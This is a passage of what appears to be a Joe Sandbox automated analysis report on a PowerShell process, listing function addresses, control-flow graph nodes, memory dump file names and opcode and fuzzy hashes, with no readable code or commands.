                                                                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                                                                control_flow_graph 301 4e9bad8-4e9bb78 306 4e9bb7a 301->306 307 4e9bb7e-4e9bb89 301->307 306->307 308 4e9bb8b 307->308 309 4e9bb8e-4e9bbe8 call 4e9afc0 307->309 308->309 316 4e9bc39-4e9bc3d 309->316 317 4e9bbea-4e9bbef 309->317 319 4e9bc3f-4e9bc49 316->319 320 4e9bc4e 316->320 317->316 318 4e9bbf1-4e9bc14 317->318 322 4e9bc1a-4e9bc25 318->322 319->320 321 4e9bc53-4e9bc55 320->321 323 4e9bc7a-4e9bc7d call 4e9a5a0 321->323 324 4e9bc57-4e9bc78 321->324 325 4e9bc2e-4e9bc37 322->325 326 4e9bc27-4e9bc2d 322->326 328 4e9bc82-4e9bc86 323->328 324->328 325->321 326->325 331 4e9bc88-4e9bcb1 328->331 332 4e9bcbf-4e9bcee 328->332 331->332
                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 00000007.00000002.2239303092.0000000004E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E90000, based on PE: false
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_4e90000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                                • String ID: q
                                                                                                                                                                                                                                                                                                                • API String ID: 0-3452382182
                                                                                                                                                                                                                                                                                                                • Opcode ID: ae28dd0fbd1ed0120678519f981240aee4bcce9d507fb29ac18658512db1d2ac
                                                                                                                                                                                                                                                                                                                • Instruction ID: 87f8106f4e35ce6fc58a2314a35722c566c335bd77ef6cf7eff3ebac5cebf311
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ae28dd0fbd1ed0120678519f981240aee4bcce9d507fb29ac18658512db1d2ac
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5551F370E002489FDB54CFA9D584A9DBBF5FF88314F14806AE819AB364EB74AD45CF90
                                                                                                                                                                                                                                                                                                                Function 04E96FE0 Relevance: 1.4, Strings: 1, Instructions: 113COMMON
                                                                                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                                                                control_flow_graph 449 4e96fe0-4e96fff 450 4e97105-4e9713f 449->450 451 4e97005-4e97008 449->451 479 4e9700a call 4e9767c 451->479 480 4e9700a call 4e97697 451->480 452 4e97010-4e97022 454 4e9702e-4e97043 452->454 455 4e97024 452->455 461 4e97049-4e97059 454->461 462 4e970ce-4e970e7 454->462 455->454 463 4e9705b 461->463 464 4e97065-4e97070 461->464 466 4e970e9 462->466 467 4e970f2 462->467 463->464 476 4e97073 call 4e9bf98 464->476 477 4e97073 call 4e9bf48 464->477 478 4e97073 call 4e9bf38 464->478 466->467 467->450 469 4e97079-4e9707d 470 4e970bd-4e970c8 469->470 471 4e9707f-4e9708f 469->471 470->461 470->462 472 4e970ab-4e970b5 471->472 473 4e97091-4e970a9 471->473 472->470 473->470 476->469 477->469 478->469 479->452 480->452
                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 00000007.00000002.2239303092.0000000004E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E90000, based on PE: false
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_4e90000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                                • String ID: (aq
                                                                                                                                                                                                                                                                                                                • API String ID: 0-600464949
                                                                                                                                                                                                                                                                                                                • Opcode ID: b4332761dcbacb4ff43d03efae00caff9ea59c4a25a603555f43502dca1adfb0
                                                                                                                                                                                                                                                                                                                • Instruction ID: d2a9ee2c6e50dcbb56172e78c1d9aea7258f8b7e3b0123c84ac61691c4f9fe04
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b4332761dcbacb4ff43d03efae00caff9ea59c4a25a603555f43502dca1adfb0
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B8414A34B14204CFDB14DFA8C458AAEBBF1EF89315F1550A8E402AB391DA35EC45CB64
                                                                                                                                                                                                                                                                                                                Function 04E99411 Relevance: 1.3, Strings: 1, Instructions: 76COMMON
                                                                                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                                                                control_flow_graph 526 4e99411-4e99475 528 4e994aa-4e994b6 526->528 529 4e99477-4e99488 526->529 530 4e994b8-4e994c8 528->530 531 4e994ea-4e994f1 528->531 529->528 530->531 532 4e9950b-4e99513 531->532 533 4e994f3 531->533 534 4e9954a-4e99559 532->534 535 4e99515-4e99538 532->535 541 4e994f8 call 4e99560 533->541 542 4e994f8 call 4e99570 533->542 538 4e9953a-4e99540 535->538 539 4e99541-4e99548 535->539 536 4e994fe-4e99504 536->532 538->539 539->534 541->536 542->536
                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 00000007.00000002.2239303092.0000000004E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E90000, based on PE: false
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_4e90000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                                • String ID: q
                                                                                                                                                                                                                                                                                                                • API String ID: 0-3452382182
                                                                                                                                                                                                                                                                                                                • Opcode ID: b68bb3731aa16463976953a0eba009abe7b3025cdb2576f26ade6d7bcbd02d89
                                                                                                                                                                                                                                                                                                                • Instruction ID: 8910cdb1231f4b7d6a7b86d0bc77bf5048ca51a15f590e49d75706c09113d166
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b68bb3731aa16463976953a0eba009abe7b3025cdb2576f26ade6d7bcbd02d89
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 31317AB19057448EDB60CF6AD0883DABFF2EB88324F28D01ED44A9B346C67468858B61
                                                                                                                                                                                                                                                                                                                Function 04E99420 Relevance: 1.3, Strings: 1, Instructions: 69COMMON
                                                                                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                                                                control_flow_graph 558 4e99420-4e99475 560 4e994aa-4e994b6 558->560 561 4e99477-4e99488 558->561 562 4e994b8-4e994c8 560->562 563 4e994ea-4e994f1 560->563 561->560 562->563 564 4e9950b-4e99513 563->564 565 4e994f3 563->565 566 4e9954a-4e99559 564->566 567 4e99515-4e99538 564->567 573 4e994f8 call 4e99560 565->573 574 4e994f8 call 4e99570 565->574 570 4e9953a-4e99540 567->570 571 4e99541-4e99548 567->571 568 4e994fe-4e99504 568->564 570->571 571->566 573->568 574->568
                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 00000007.00000002.2239303092.0000000004E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E90000, based on PE: false
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_4e90000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                                • String ID: q
                                                                                                                                                                                                                                                                                                                • API String ID: 0-3452382182
                                                                                                                                                                                                                                                                                                                • Opcode ID: 9c595c8b31f4b5102d012a5cf0fe62bed02215964e2fca8fd5a32a9c0992db02
                                                                                                                                                                                                                                                                                                                • Instruction ID: fa02d16b58ab514378e432ec192b73494bd73c910e089efa9efeddaf14c9b4cd
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9c595c8b31f4b5102d012a5cf0fe62bed02215964e2fca8fd5a32a9c0992db02
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: FE215CB09017448EDBA0CF6AD48839AFFF6EB88314F28D41DD44D97345D77468818B61
                                                                                                                                                                                                                                                                                                                Function 04E929F0 Relevance: .2, Instructions: 211COMMON
                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 00000007.00000002.2239303092.0000000004E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E90000, based on PE: false
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_4e90000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                                • Opcode ID: d0701ddc006e12d3f03e21a1e92ab890d72c489135dc22df5fe686b0035b2a84
                                                                                                                                                                                                                                                                                                                • Instruction ID: 2e8b5bbe797193e8aeb9636239d3aa41a7c76676cc47ea4ab2470fca8a4ffc34
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d0701ddc006e12d3f03e21a1e92ab890d72c489135dc22df5fe686b0035b2a84
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 359179B4A002059FCB15CF58C4949AEFBF1FF88310B258A99D955AB3A5C735FC91CBA0
                                                                                                                                                                                                                                                                                                                Function 04E97740 Relevance: .2, Instructions: 154COMMON
                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 00000007.00000002.2239303092.0000000004E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E90000, based on PE: false
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_4e90000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                                • Opcode ID: 9b8b82b98302b87c741aed23f0ba26a92903b3b70e44e7b9fbf8f092468c93f9
                                                                                                                                                                                                                                                                                                                • Instruction ID: 66e5161c10817f7cc0c13db41b3b5acff02df48dd65830a4bcaa9ba403e86878
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9b8b82b98302b87c741aed23f0ba26a92903b3b70e44e7b9fbf8f092468c93f9
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D551CE35310211CFDB14DB69D844A6ABBE6FFC8258F249879D40ACB395EB31EC05CBA0
                                                                                                                                                                                                                                                                                                                Function 04E96FB1 Relevance: .1, Instructions: 117COMMON
                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 00000007.00000002.2239303092.0000000004E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E90000, based on PE: false
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_4e90000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                                • Opcode ID: 2fe809548fbd8fb2d9010cb7e503250763bae8888b48f98556e77e174c3d3ca7
                                                                                                                                                                                                                                                                                                                • Instruction ID: dc23bdf8a2a8830deeaa0973afd8a2ae5ccfd55e0f81db9e57fac5a092c31db6
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2fe809548fbd8fb2d9010cb7e503250763bae8888b48f98556e77e174c3d3ca7
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B2417F34A04245CFCF09CF64C494AAABFF1EF89314F1950A9D405AB392DB35DC45CB60
                                                                                                                                                                                                                                                                                                                Function 04E9C7B0 Relevance: .1, Instructions: 101COMMON
                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 00000007.00000002.2239303092.0000000004E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E90000, based on PE: false
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_4e90000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                                • Opcode ID: 4e9954dbd2e59f2bf298ac8664850a987d5647df118bb4af11418b8416d6fe98
                                                                                                                                                                                                                                                                                                                • Instruction ID: 071c138b80caa2ecba94d721a733011eaa29d1cf377bc4f0b66531f063c2cce9
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4e9954dbd2e59f2bf298ac8664850a987d5647df118bb4af11418b8416d6fe98
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: EB318D313006019FD715EB78D854A9AB7D6EFC8214F00853DD50ACB3A5DB70AC49CBA1
                                                                                                                                                                                                                                                                                                                Function 04E9AE89 Relevance: .1, Instructions: 92COMMON
                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 00000007.00000002.2239303092.0000000004E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E90000, based on PE: false
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_4e90000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                                • Opcode ID: ac25102330007f56f707d2bc0e15b2d61edb7ed460115603be715d41f28de506
                                                                                                                                                                                                                                                                                                                • Instruction ID: 02935ea94a9d22ee7241f76d0ce1c30696aac20341ab48627f11a2185c193ad8
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ac25102330007f56f707d2bc0e15b2d61edb7ed460115603be715d41f28de506
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3D316A70A006499FDF14DFA9D494BEEBBF2EF88314F149069E405EB390EA749C858F91
                                                                                                                                                                                                                                                                                                                Function 04E9AD4F Relevance: .1, Instructions: 86COMMON
                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 00000007.00000002.2239303092.0000000004E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E90000, based on PE: false
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_4e90000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                                • Opcode ID: 351bd7e61779a9a2b1113fc36de8017630b61f16c3115a304f178f355b4554a2
                                                                                                                                                                                                                                                                                                                • Instruction ID: a7ef6bde1a5d76de81e331b7c41ca08e55eecb3ba35279ff844742c099c99b5d
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 351bd7e61779a9a2b1113fc36de8017630b61f16c3115a304f178f355b4554a2
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 57318F74A002089FEB40DFB4D454AFEBBF2EF84304F1084B9C504AB394DA35AD468FA1
                                                                                                                                                                                                                                                                                                                Function 04E9AE98 Relevance: .1, Instructions: 84COMMON
                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 00000007.00000002.2239303092.0000000004E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E90000, based on PE: false
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_4e90000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                                • Opcode ID: b71b589e6a912b069ff4f57823b9f1a9dae3e99ef11c2e22f1f937f71f62d08a
                                                                                                                                                                                                                                                                                                                • Instruction ID: d2d733e6cdac0c15ddef8f523c49e1dc26e6d1c32b660bef8505727c2d1d203a
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b71b589e6a912b069ff4f57823b9f1a9dae3e99ef11c2e22f1f937f71f62d08a
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8D316B70E006098FDF54DFA9C454BAEBBF6AF88304F149039E405EB390EA349C458FA0
                                                                                                                                                                                                                                                                                                                Function 04E9E210 Relevance: .1, Instructions: 83COMMON
                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 00000007.00000002.2239303092.0000000004E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E90000, based on PE: false
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_4e90000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                                • Opcode ID: acac1d3424435500f66bad27e6e27a373a3900c1685d06b6a49e8f9c3106fa89
                                                                                                                                                                                                                                                                                                                • Instruction ID: 4b57e7d36ebfd8e9a07b9686faed8b7ccf0a42ccc60fdd5a4341ca1829112678
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: acac1d3424435500f66bad27e6e27a373a3900c1685d06b6a49e8f9c3106fa89
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D7313A74A042048FCB14DF68E458AAEBBF1EF8D224F144469D406EB3A1DB75AD85CF91
                                                                                                                                                                                                                                                                                                                Function 079C27C4 Relevance: .1, Instructions: 81COMMON
                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 00000007.00000002.2253750907.00000000079C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079C0000, based on PE: false
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_79c0000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                                • Opcode ID: 5258bd9a92f898789db7d93a0d2d8cca2200000f1291ae85f8f034ef2ecde6a8
                                                                                                                                                                                                                                                                                                                • Instruction ID: 7754e36470543df5da2f7399195ce42ce193b5dffdcfe4410d9d116ffb3632e3
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5258bd9a92f898789db7d93a0d2d8cca2200000f1291ae85f8f034ef2ecde6a8
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 00218DB1A14206DFEF20CF59C644B6577F9BB45329F05C0AAE908CB261C774D984CBA3
                                                                                                                                                                                                                                                                                                                Function 04E9E220 Relevance: .1, Instructions: 77COMMON
                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 00000007.00000002.2239303092.0000000004E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E90000, based on PE: false
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_4e90000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                                • Opcode ID: 840d22a9e6cd85b00792523e0854de4e40f660772b4567a49d15bd7f41e4c441
                                                                                                                                                                                                                                                                                                                • Instruction ID: 01b2612122c0f107565c7b2769a114d0a0c227e0a7d182f7c0848f276a19bae2
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 840d22a9e6cd85b00792523e0854de4e40f660772b4567a49d15bd7f41e4c441
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 02312770A002048FCF18DF69D458AAEBBF2EF8C218F144429D406EB3A0DB75AD85CF94
                                                                                                                                                                                                                                                                                                                Function 04E9AD60 Relevance: .1, Instructions: 77COMMON
                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 00000007.00000002.2239303092.0000000004E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E90000, based on PE: false
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_4e90000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                                • Opcode ID: 3b1a8afa08317ec6db83176eb4486ae369ed5c89bbf6fb60c43c323b02c88901
                                                                                                                                                                                                                                                                                                                • Instruction ID: 57d1559d4f92e19cc68eb904a8b652381fbdc5e3c5f41b763e28c8740ce22376
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3b1a8afa08317ec6db83176eb4486ae369ed5c89bbf6fb60c43c323b02c88901
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 913149B4A002099FEB44EFA4D854ABEBBF2EF84304F1084799515AB394DB35AD018FA1
                                                                                                                                                                                                                                                                                                                Function 049AF408 Relevance: .1, Instructions: 76COMMON
                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 00000007.00000002.2238355426.00000000049AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 049AD000, based on PE: false
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_49ad000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                                • Opcode ID: 40ab4956fdeca54c027ffb4bef87d600c82a054e090a2194da5eae4be329cf4e
                                                                                                                                                                                                                                                                                                                • Instruction ID: f0d74905e9fe6816a64dceb052a574976386bec3919684333847edc031bec536
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 40ab4956fdeca54c027ffb4bef87d600c82a054e090a2194da5eae4be329cf4e
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8521C471604200DFDF05DF54D9C8B26BFA6FB88314F24C5B9E9094A25AC736E866CBA1
                                                                                                                                                                                                                                                                                                                Function 049AF05C Relevance: .1, Instructions: 72COMMON
                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 00000007.00000002.2238355426.00000000049AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 049AD000, based on PE: false
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_49ad000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                                • Opcode ID: 726345b082f4adfc47e3f2a1be87f1947242fbe3121347463b2ca31424443b2a
                                                                                                                                                                                                                                                                                                                • Instruction ID: 532d625bef948e69c15bcb33ceadb7db6f6ab780e6528b9b5bb5c52b835d5ece
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 726345b082f4adfc47e3f2a1be87f1947242fbe3121347463b2ca31424443b2a
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 40210471604200DFCB14DF24D9C4B26BBA5EB84318F24CABDD9094B25AD336E866CBA1
                                                                                                                                                                                                                                                                                                                Function 04E9767C Relevance: .1, Instructions: 62COMMON
                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 00000007.00000002.2239303092.0000000004E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E90000, based on PE: false
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_4e90000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                                • Opcode ID: 84e48f6490019d2ec819ffb384057ab8703080c69a96e13dc9c908354cbbf845
                                                                                                                                                                                                                                                                                                                • Instruction ID: d547aee72e3285ef726a92e83a97ec6ad78b7826ee385ff2e33042e39c212c7b
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 84e48f6490019d2ec819ffb384057ab8703080c69a96e13dc9c908354cbbf845
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: BA112B3A700118CFCF04DFACD944AEDB7F6EBC8255B0440A9E909EB365DA35EC158BA0
                                                                                                                                                                                                                                                                                                                Function 049AF403 Relevance: .1, Instructions: 57COMMON
                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 00000007.00000002.2238355426.00000000049AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 049AD000, based on PE: false
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_49ad000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                                • Opcode ID: ac59097383679d3c36945f3a55f47b1b34a77431d90e23eb4db771cfbaa4427a
                                                                                                                                                                                                                                                                                                                • Instruction ID: 3af33e19e23779794fdf425971609fd3624f39b3490ddc08b906906111143eb5
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ac59097383679d3c36945f3a55f47b1b34a77431d90e23eb4db771cfbaa4427a
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 10218C76504240DFCB16CF10D9C8B16BFB2FB88314F24C5AAD9094A65AC33AD46ACB91
                                                                                                                                                                                                                                                                                                                Function 04E9BD08 Relevance: .1, Instructions: 54COMMON
                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 00000007.00000002.2239303092.0000000004E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E90000, based on PE: false
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_4e90000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                                • String ID:
